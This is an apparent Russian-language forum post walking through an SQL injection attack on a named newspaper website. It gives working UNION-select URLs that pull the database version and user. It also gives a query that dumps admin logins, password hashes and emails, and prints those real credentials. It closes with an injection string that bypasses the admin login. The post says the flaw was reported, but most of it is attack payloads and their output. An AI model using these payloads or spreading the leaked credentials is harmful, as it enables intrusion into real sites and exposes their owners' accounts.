nvsaratov.ru - газета "Новые Времена"
случайно наткнулся на сей сайт...
Код:
http://nvsaratov.ru/default.php?go=show&id=4887&paper_id=1'+union+select+1,2,3,4,version(),6,user(),8,9,10,11/*
4.1.22-log nvsaratov@hosting.overta.ru
думал се... а нет. тыкнув кавычкой в админке вылезла ошибка:
Ошибка в запросе: SELECT id, ip, login, pass, name, email FROM __admin WHERE LOWER(login)=LOWER('' or 1=1/*') AND ((pass='21232f297a57a5a743894a0e4a801fc3' AND is_encoded=1) OR (pass='admin' AND is_encoded=0)) LIMIT 1
из которой сразу видны таблица и колонки =)
Код:
http://nvsaratov.ru/default.php?go=show&id=4887&paper_id=1'+union+select+1,2,3,4,concat(login,char(58),pass,char(58),email,char(58),name),6,7,8,9,10,11+from+__admin/*
webmaster:824dbff1455fe6ed2d753200a889fbb1:nv.sara tov@overta.ru:Новые времена
admin:0b944a04224b108c29b460245a13664e:design@over ta:Администратор
собсно расшифровывать пароли мы не будем... а исходя из вышеупомянутой ошибки, составим запрос =)
Код:
0b944a04224b108c29b460245a13664e' AND is_encoded=1) OR (pass='12345' AND is_encoded=0)) LIMIT 1/*
куда его вставлять додумывайте сами... вуаля мы в админке =) п.с. информация о уязвимости была отправлена